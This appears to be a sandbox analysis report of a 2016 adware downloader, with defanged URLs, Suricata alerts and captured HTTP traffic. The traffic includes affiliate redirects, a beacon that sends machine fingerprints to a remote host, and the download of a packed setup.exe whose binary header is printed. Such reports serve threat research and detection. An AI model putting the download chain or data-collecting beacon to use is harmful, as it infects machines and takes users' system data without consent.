| hxxp://ee.ilentialnessme.bid/report.php?typ=sys&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&transId=135176390&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.44531263149565414 | |
| hxxp://ee.ilentialnessme.bid/report.php?typ=conversion&transId=135176390&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&s1=117&s2=151377&s3=&s4=&s5=1399165537&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.3799597195784592 | |
| hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=setup&name=Installation | |
| hxxp://gurusetman.info/taveara?q=setup | |
| hxxp://greates.info/?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr | |
| hxxp://oblo.raidedsentry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye | |
| hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | |
| hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php | |
| hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html | |
| hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css | |
| hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png | |
| hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png | |
| hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png | |
| hxxp://n135adserv.com/js/show_ads_supp.js?pubId=907 | |
| hxxp://ic-dc.deliverydlcenter.com/favicon.ico | |
| hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | |
| hxxp://www.1-1ads.com/js/show_ads_supp.js?pubId=907 | |
| hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | |
| hxxp://away.yosauruslega.bid/get.php?ses=429155916441231936 | |
| hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | |
| hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | |
| hxxp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=setup&name=Installation | |
| hxxp://www.selfdislikedfarfet.site/index.php | |
| hxxp://win.ketydesmidiana.bidhxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN Backdoor User-Agent (InstallCapital)
ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET MALWARE SoundCloud Downloader Install Beacon
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css HTTP/1.1
Accept: text/css
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 1967
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT
ETag: "92657668b4257695bd2699a787aee60b"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64444
X-Cache: Hit from cloudfront
Via: 1.1 e7ce333c56f455a0dae7f1f5ea5d6086.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fhHJWlc0aTPvIif0TAxqMwP162bjl_kkLruNbHh_EQJHE-Lfs25efg==body{...margin: 0;...padding: 0;...font-family: Helvetica, Arial, sans
-serif;..}..h1{...margin: 0;...font-size: 28px;...font-weight: normal;
...text-align: center;...color: #333;..}...container{...margin: 0 auto
;...width: 980px;...padding-left: 20px;...padding-right: 20px;..}...he
ader h1.typ{...line-height: 80px;...padding-top: 0;..}...header h1{...
padding-top: 13px;..}...header h1 span{...display: block;...font-size:
14px;..}...header-top, .header-bottom{...position: relative;...height
: 80px;...width: 100%;..}...header-top.green{...background: #22B573;..
}...header-top.blue{...background: #0461C9;..}...header-bottom.grey{..
.background: #CCCCCC;..}...header-bottom.light-blue{...background: #B6
D2F2;...border-bottom:1px solid #02294C;..}..#widget{...margin: 0 auto
;...margin-top: 50px;...margin-bottom: 150px;..}...footer{...position:
relative;...width: 100%;...height: 216px;...background: #e5e5e5;...bo
rder-top: 1px solid #fff;...-webkit-box-sizing: border-box;...-moz-box
-sizing: border-box;...box-sizing: border-box;..}...footer:before{...p
osition: absolute;...left: 0;...right: 0;...top: -2px;...height: 1px;.
..width: 100%;...content: '';.....}...footer.green:before{...backgroun
d: #0F4C2E;..}...footer.blue:before{...background: #02294C;..}...foote
r h3{...margin-top: 38px;...margin-bottom: 28px;...font-size: 18px;...
text-align: center;...text-shadow: -1px 1px 0 #fff;..}...footer h3.gre
en{...color: #22B573;..}...footer h3.blue{...color: #0461C9;..}..ul.st
eps{...margin: 0;...padding: 0;...list-style-type: none;..}..ul.st<<< skipped >>>
GET /?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: greates.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2016 05:19:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d173566d0828d0aa2e2d9476f9244ccef1479014359; expires=Mon, 13-Nov-17 05:19:19 GMT; path=/; domain=.greates.info; HttpOnly
X-Powered-By: PHP/5.4.16
Location: hXXp://oblo.raidedsentry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye
Server: cloudflare-nginx
CF-RAY: 300fc4a1f37f2902-OTP
POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.selfdislikedfarfet.site
Content-Length: 523
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1479014369&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 13 Nov 2016 05:19:30 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
37c1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
 <head>
 <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
 <title>DownloadManagerModern</title>
 <script type="text/javascript">
 var g_notCompatibleWithUpdaterComps = ['LootFindKP'];
 var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];
 </script>
 <base href="hXXp://VVV.selfdislikedfarfet.site:80/index.php" />
 <link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" />
 <script type="text/javascript" src="hXXp://cdn1.leadingdownload.com/V38/amipb.js"></script>
 <script type="text/javascript">
var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png";
var g_r_appname="installer";
var g_r_cmdline="\/S";
var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';
 var g_finish_install_button = '1';
 var g_popup_install_all = '1';
 var g_eula = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3R<<< skipped >>>
GET /0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: oblo.raidedsentry.ru
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sun, 13 Nov 2016 05:19:19 GMT
Content-Type: application/exe; charset=windows-1251
Content-Length: 4758720
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="setup.exe"
Content-Transfer-Encoding: binary
Pragma: public
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
......$..f$.......$......0$...@...........................I.......H...
.......@............................1..7...P4..v...........|H.. ...@2.
.............................02.......................................
..............CODE....T.$.......$................. ..`DATA.........0$.
......$.............@...BSS...........0.......0..................idata
...7....1..8....0.............@....tls....0.... 2.......0.............
.....rdata.......02.......0.............@..P.reloc.......@2.......0...
..........@..P.rsrc....v...P4..x....3.............@..P..............>......0=.............@..P...........................................
......................................................................
.................................................@...Boolean..........
.@..False.True.@.,.@...WideChar..........D.@...Char..........X.@...Sma
llint..........p.@...Integer.............@...Byte............@...Word.
...........@...Cardinal............@...Int64...................@...Dou
ble..@...@...Real....@...Currency....@...ShortString...$.@...WordBool.
........ .@..False.True..L.@...LongBool.........H.@..False.True..t.@..
.String..@...WideString..@...Variant.@...@...OleVariant..@............
...................@.........0E@.<E@.@E@.DE@.8E@.lB@..B@..B@..T<<< skipped >>>
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 3392
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT
ETag: "122fe75beae30ff3ea83688e03402879"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64443
X-Cache: Hit from cloudfront
Via: 1.1 d76fac2b5a2f460a1cbffb76189f59ef.cloudfront.net (CloudFront)
X-Amz-Cf-Id: zgILzJjnODf9_u3eKN_YRJY1_4NUoxU3WshC48sfjHLWtnBwAHE_Mg==
.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq
.e<....IDATx..[{l[W.?..g..fvR.]..2.4.z.N..?jOC......C....IS[....%Y.
...........i].@..c.@.?Hs%.:&.....&..c.............#YIS...;.w.....cB.O.
.....GE.l.3.n7.2Rv..FQ..JF. ...Lt.....?..m.cN...'yK...k..Y..l.........
.j...qO:.?.......n...8K........K7<9X.db.$.....b.............=-.....
...<uhB..2......-/VI.Hzy.$."..?y...<.....-.iF..x.. ...N..ke....)
......!._.mJc..p,a.Z.Gd.x.(...p.......j....~3.. .I..a....~4...S...NN0f
.W..2.I.....t....i`..1d.6....E...^.oKGb$qm.}..;.f...g...h%x..t.K ..'..
.....(X...W.:...]#.p......>.._;.>j..{..V.(k.W...O\....oj..^.....
K.lq>.<.......eJ........?..Yp.`.Ic........F............OV.../...
n.....u.3...F..`... .....oj..b.......7"..;]i.B.. ...K.A{..W.^.g....9..
?}..p....R.M....i..N.D....;......QK..,".....9.....ub>...P.....g:9/.
..:?.y?..a8...L....L.b.s............W...O|.S...w*...3=..J.,...:...3ok.
.mz....W....E.S.F.N...99K.v.S.P.......].!ey:]#C..!.8 .W...D;dq.......>;...|Y.,3D.Gq.Mg.D..i.|..X.......[.@.s8.8sVD.*cYmj.=.3..2........W.
..vw...fy9^.....z......pEQ. ...Q....T....#.[/..t.0z.h!..>t.....%".B
l.{.<.{.JW.....?.3h.{w...(...DF..p...dV.}X....PJ...n.A.....o. p.(..
........H..3....H...N....F)p8....$.......Y....z:Tn.....W.q....6..D..G.
Ud.f.....C.X....D......N..{..T.j......../."..=...g..)..<(hwX.rf...0
...Z=J..=....1B..n.$U\.P.re.ku.u&8.nC.........W........so..../.O5...G.
....OB#%...x...~..`.;.....^.m."...........q..S]..T.....Fj)>...|.jZ.
..['.....:.s.x..O.m.....[....\$0..{..&.r...^.U...?.o..Y.......ZW].<<< skipped >>>
GET /normal_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 26781
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:07 GMT
ETag: "b5b0ebe137c0293f816eaac3de2b4e51"
Accept-Ranges: bytes
Server: AmazonS3
Age: 39984
X-Cache: Hit from cloudfront
Via: 1.1 8d84df16ba20ff1d2ca3914948494e04.cloudfront.net (CloudFront)
X-Amz-Cf-Id: uBkHd_5RoRqHN9as-QnlhLcpdLg65yUcQ1ooISYFQfMUoHgFEyDRww==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.com/xap/1.0/.
<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 ">
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:889F23E5F49B11E4A1FBA1E3C36AE7EE" xmpMM:DocumentID="xmp.did:889F23E6F49B11E4A1FBA1E3C36AE7EE">
<xmpMM:DerivedFrom stRef:instanceID="xmp.iid:889F23E3F49B11E4A1FBA1E3C36AE7EE" stRef:documentID="xmp.did:889F23E4F49B11E4A1FBA1E3C36AE7EE"/>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>
<?xpacket end="r"?>
....Adobe.d............................................
......................................................................
.................................E....................................
................................................!.1AQa...q.....2R..u.7
...."...U..B.....5.b..%4Tte'r.E..#$D......................!1."AQ2.a..B
R.q...b.#3.....r......S......C.............?....j9...n..OK....xr...8..
q.C..o..k.k..L[3...v....z.zqNi(...T..#.mJ..TU.....SYi.U.-[NJ9..e.IU.;.
k.KY...Rm..{.....K...M..D.b...E.;.k.K[..#&.kG.....F..........k~p., ...
.J. .0...K-7.(..m..2q...1.}.V.1l...U........E.....*..5..fi.Oe.{...<<< skipped >>>
GET /appImg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 4628
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:06 GMT
ETag: "ba6c4124ad5d33528fe1d609e6ac1ff0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 39984
X-Cache: Hit from cloudfront
Via: 1.1 bd3e2233bf25337a89461c638cad13b9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: U-EUqNxZUN-BrxOxbK_UDEar3VnABPkQfmkMdNlTHZNm6Mm0Ye_qvA==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.com/xap/1.0/.
<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 ">
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:E39F75D6F49A11E4B7DAEACD8AA72C6E" xmpMM:DocumentID="xmp.did:E39F75D7F49A11E4B7DAEACD8AA72C6E">
<xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E39F75D4F49A11E4B7DAEACD8AA72C6E" stRef:documentID="xmp.did:E39F75D5F49A11E4B7DAEACD8AA72C6E"/>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>
<?xpacket end="r"?>
....Adobe.d............................................
......................................................................
...............................K.G....................................
....................................................!..1AQa.."R.T.q24D
.%...B#dEU'.bSc.5u&C$t.67(.....................!1AQa..."2BR.q...b....r
S.......#............?.<fnfHr.B..v.......ddD.P.Q5.(.(t.....%.KH....
,...@L..f.|?..4G.....[......b.......).4_....=.<.....o.....}....6..3
D....w........u.{..e.(...yN..f..sr......}...G.o......G\...-TBL.<fex
.=.;...u.;..vO6..}.:p...^"x...G.s...k.=....../.t....xg.4O..^..e..z<<< skipped >>>
GET hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: win.ketydesmidiana.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 13 Nov 2016 05:19:07 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02854-1022cfb36461ebc8195bc69760cdf1-2291-4-0-0-0-0-UA-0-32313830-30-30-_-_-30-194.242.96.226-20161113001907-_-7A6E6C272A16063B3C1716017461103D5562581C522C06645C4244007D0960733C7E091640616B0D16; expires=Tue, 13 Dec 2016 05:19:07 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Tue, 08 Oct 2019 15:59:07 GMT; path=/;
tracking_id: 1022cfb36461ebc8195bc69760cdf1
X-Robots-Tag: noindex, nofollow
Content-Length: 453
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a>.</p>
</body></html>
<<< skipped >>>
GET /report.php?typ=conversion&transId=135176390&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&s1=117&s2=151377&s3=&s4=&s5=1399165537&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.3799597195784592 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.ilentialnessme.bid
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:30 GMT
Content-Length: 0
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 3782
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:51 GMT
ETag: "f62071084680ed861fa12c3ea47cb6e1"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64443
X-Cache: Hit from cloudfront
Via: 1.1 3ef066dcf359ad5dbc339df978147194.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pX-9uxJlT7jHPHPa1yz36Uw4GIzmVJmi_A2mcbd77axMEEGJVaJgoQ==
.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq
.e<...hIDATx..[kl#W....yO......?..u..H..P..J...$@..K...l. .}..}P@@.
.J........q..H@3.E.u@.".Zg7.$..$q..f..\...c;....(W;.].x.~......;....?.
.....c.|X........B...;D...rv&.M..eE...eZ..1Ts5....E?..{O.x....B.. ..=B
...D...~.,,..p.493...XB.R...2&......1...., .5.....b[.B`ae...oF...p.FZ.
,."..zh......p...yH.l>!4:. .[aXi.3.... |.. ..t.....J...../4...(T.me
L..'9ceC.]R//...FkW.Z...vpb6d..?......=.x..M.RO....P..p[c-..K.p.,v....
....K.|.=......:!..2............<`....j....Mq...C<{*L2j.^05g.q=}
qy`..sy ]3.UK.j.....o.Z.......2&u5{.fw.}6.Oe8cuCO._..<.Jd.9.;......
.[4.2.i....y.K.Z.......q..J.A^..g......1..|.lN.)8............f.q]...4.
...........I..c...=.2..[..2LZ.1rIf....3.....M...2.M.f..R siU..i..0....
.9_.?.'...S.R#.sN.{.s.........@7...%..{........w>....A.V...{?..V9.*
G.....,.......lA.:7.........E.q.C..._W.Dd.k;&D..4..E}3.}..X.c.)`.!.$..
